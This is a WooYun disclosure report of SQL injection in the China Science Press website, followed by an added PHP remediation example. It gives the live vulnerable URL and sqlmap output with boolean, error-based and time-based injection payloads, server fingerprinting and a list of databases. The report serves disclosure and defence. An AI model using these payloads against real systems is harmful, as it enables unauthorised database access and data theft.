Vulnerability summary

Defect ID: wooyun-2014-080329

Title: SQL injection in the China Science Press website can lead to data leakage

Vendor: China Science Press (中国科学出版社)

Author: xxsec

Submitted: 2014-10-22 11:04

Fixed: 2014-12-06 11:06

Published: 2014-12-06 11:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-10-22: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-06: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Mad respect to zhuzhuxia, begging for a magic tool; doing it by hand hurts too much.......

Detailed description:

1. Injection point: http://www.sciencep.com/t_second.php?id=798 (GET) (mainly because the t_second.php file does no filtering of the parameter)
2.

sqlmap identified the following injection points with a total of 296 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=798 AND 6024=6024
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=798 AND (SELECT 5731 FROM(SELECT COUNT(*),CONCAT(0x7164726671,(SELECT (CASE WHEN (5731=5731) THEN 1 ELSE 0 END)),0x7176786971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: id=798 AND 9246=BENCHMARK(5000000,MD5(0x704e5a66))
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] sciencep_db
[*] test


3.

Database: sciencep_db
[158 tables]


4.

Proof of vulnerability:

Database: sciencep_db
Table: hxhd_member
[19 entries]
+----------------+-----------+
| pwd | uname |
+----------------+-----------+
+----------------+-----------+

Fix:

Filter the input.

Copyright notice: please credit the source, xxsec@WooYun, when reposting.
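The root cause the report names is that t_second.php passes the id parameter into the query unchecked. As an added example (not the site's own code; the table and column names article_t, title and body, the DSN and the credentials are assumptions), here is the vulnerable concatenation pattern next to a fixed handler that validates the type and binds the value with a PDO prepared statement:

```php
<?php
// Added example, not code from the affected site. Table/column names are assumed.

// VULNERABLE pattern (what the report implies): the raw GET value is glued into
// the SQL text, so "798 AND 6024=6024" or a BENCHMARK() call runs as SQL.
function vulnerableQuery(array $get): string {
    return "SELECT title, body FROM article_t WHERE id = " . $get['id'];
}

// HARDENED: validate the type, then bind the value as a parameter.
function fetchArticle(PDO $db, array $get): ?array {
    // 1. id must be a positive integer. Anything else is rejected before it
    //    reaches the database, and is worth logging as a probe.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // 2. The value travels separately from the SQL text, so no quoting or
    //    blacklist "filtering" of the input is needed.
    $stmt = $db->prepare('SELECT title, body FROM article_t WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage. DSN and credentials are placeholders; emulated prepares are disabled
// so MySQL itself receives the statement with a real placeholder.
$db = new PDO('mysql:host=localhost;dbname=sciencep_db;charset=utf8mb4',
              'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$article = fetchArticle($db, $_GET);
```

The dumped hxhd_member rows also show the pwd column holding passwords in clear text; storing them with password_hash() and checking with password_verify() would have limited the impact of the dump.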


Vulnerability responses

Vendor response:

The vendor could not be reached, or the vendor actively refused the report.
